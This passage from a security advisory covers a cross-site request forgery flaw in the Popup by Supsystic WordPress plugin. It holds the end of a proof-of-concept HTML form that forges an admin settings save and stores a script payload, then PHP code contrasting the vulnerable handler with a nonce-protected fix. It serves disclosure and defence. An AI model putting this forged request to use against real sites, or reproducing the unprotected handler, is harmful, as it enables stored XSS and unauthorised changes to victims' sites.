value="admin&@...l.com" />
			<input type="hidden" name="params[tpl][sub_new_subject]" value="New
Subscriber on Summer of Pwnage" />
			<input type="hidden" name="params[tpl][sub_new_message]" value="You
have new subscriber on your site <a
href=&quot;[siteurl]&quot;>[sitename]</a>, here us subscriber
information:<br />[subscriber_data]" />
			<input type="hidden" name="stat_from_txt" value="" />
			<input type="hidden" name="stat_to_txt" value="" />
			<input type="hidden" name="css" value="" />
			<input type="hidden" name="html" value="<link
rel=&quot;stylesheet&quot; type=&quot;text/css&quot;
href=&quot;//fonts.googleapis.com/css?family=Amatic+SC&quot; />&#10; 
<script>alert(&quot;xss&quot;)</script>&#10;<div
id=&quot;ppsPopupShell_[ID]&quot; class=&quot;ppsPopupShell
ppsPopupListsShell&quot;>&#10;	<a href=&quot;#&quot;
class=&quot;ppsPopupClose
ppsPopupClose_[close_btn]&quot;></a>&#10;&#10;	<div
class=&quot;ppsInnerTblContent&quot;>&#10;		<div
class=&quot;ppsPopupListsInner ppsPopupInner&quot;>&#10;			[if
enb_label]&#10;				<div class=&quot;ppsPopupLabel
ppsPopupListsLabel&quot;>[label]</div>&#10;			[endif]&#10;			<div
style=&quot;clear: both;&quot;></div>&#10;			[if enb_txt_0]&#10;				<div
class=&quot;ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0
ppsPopupTxt_0&quot;>&#10;				[txt_0]&#10;				</div>&#10;			[endif]&#10;			[if
enb_subscribe]&#10;				<div
class=&quot;ppsSubscribeShell&quot;>&#10;					[sub_form_start]&#10;					[sub_fields_html]&#10;					<input
type=&quot;submit&quot; name=&quot;submit&quot;
value=&quot;[sub_btn_label]&quot;
/>&#10;					[sub_form_end]&#10;					<div style=&quot;clear:
both;&quot;></div>&#10;				</div>&#10;			[endif]&#10;			<div
style=&quot;clear: both;&quot;></div>&#10;			<div
class=&quot;ppsRightCol&quot;>&#10;				[if enb_sm]&#10;					<div
style=&quot;clear: both;&quot;></div>&#10;					<div
class=&quot;ppsSm&quot;>&#10;					[sm_html]&#10;					</div>&#10;				[endif]&#10;				[if
enb_foot_note]&#10;					<div
class=&quot;ppsFootNote&quot;>&#10;					[foot_note]&#10;					</div>&#10;				[endif]&#10;			</div>&#10;		</div>&#10;	</div>&#10;</div>&#10;"
/>
			<input type="hidden" name="params[opts_attrs][bg_number]" value="2"
/>
			<input type="hidden" name="params[opts_attrs][txt_block_number]"
value="1" />
			<input type="hidden" name="mod" value="popup" />
			<input type="hidden" name="action" value="save" />
			<input type="hidden" name="id" value="100" />
			<input type="hidden" name="params_tpl_txt_val_0" value="<p>Popup by
Supsystic lets you easily create elegant overlapping windows with
unlimited features. Pop-ups with Slider, Lightbox, Contact and
Subscription forms and more</p>" />
			<input type="hidden" name="pl" value="pps" />
			<input type="hidden" name="reqType" value="ajax" />
			<input type="submit"/>
		</form>
	</body>
</html>
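The proof-of-concept form above submits `mod=popup`, `action=save` and `id=100` to the plugin's admin endpoint carrying nothing but the victim's session cookie: no nonce, so the server cannot tell a submission from its own settings page apart from one auto-submitted by an attacker's page. Note also that the `html` field in the PoC carries a `<script>` tag, so a successful CSRF stores attacker-controlled markup in the popup template. The following is an added illustration of the missing check, written for this advisory and not taken from Popup by Supsystic's code: the hook name `pps_example_save`, the nonce action string, the `_wpnonce` field name and the option key are assumptions chosen for the example.

```php
<?php
/*
 * Added example for this advisory; not code from Popup by Supsystic.
 * Hook name, nonce action, field name and option key are assumptions.
 */

// Settings page: emit the save form together with a nonce that is bound to
// the current user and to this action. An attacker's page cannot read it.
function pps_example_render_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-ajax.php' ) ) . '">';
    echo '<input type="hidden" name="action" value="pps_example_save" />';
    echo '<input type="hidden" name="id" value="100" />';
    // Adds the hidden _wpnonce field (and a referer field) to the form.
    wp_nonce_field( 'pps_example_save_100', '_wpnonce' );
    echo '<input type="submit" />';
    echo '</form>';
}

// Vulnerable pattern, the one the PoC above relies on: only a capability
// check. The victim's browser attaches the admin cookie to the cross-site
// POST, so current_user_can() passes and the attacker-chosen params are saved.
function pps_example_save_unprotected() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $id = absint( $_POST['id'] ?? 0 );
    update_option( 'pps_example_popup_' . $id, wp_unslash( $_POST['params'] ?? array() ) );
    wp_send_json_success();
}

// Hardened pattern: verify the nonce before anything else. check_ajax_referer()
// dies with -1 when the nonce is missing, forged or expired, so the form from
// the PoC (which has no _wpnonce field at all) never reaches update_option().
function pps_example_save_protected() {
    $id = absint( $_POST['id'] ?? 0 );
    check_ajax_referer( 'pps_example_save_' . $id, '_wpnonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    update_option( 'pps_example_popup_' . $id, wp_unslash( $_POST['params'] ?? array() ) );
    wp_send_json_success();
}
add_action( 'wp_ajax_pps_example_save', 'pps_example_save_protected' );
```

The nonce is tied to the popup `id` so that a token issued for one popup's form cannot be replayed against another. A capability check on its own is not a CSRF defence, since the whole point of the attack is that the request is made by a user who does have the capability; the nonce is what proves the request originated from the plugin's own page.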
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/popup_by_supsystic_wordpress_plugin_vulnerable_to_cross_site_request_forgery.html
[2] https://wordpress.org/plugins/popup-by-supsystic/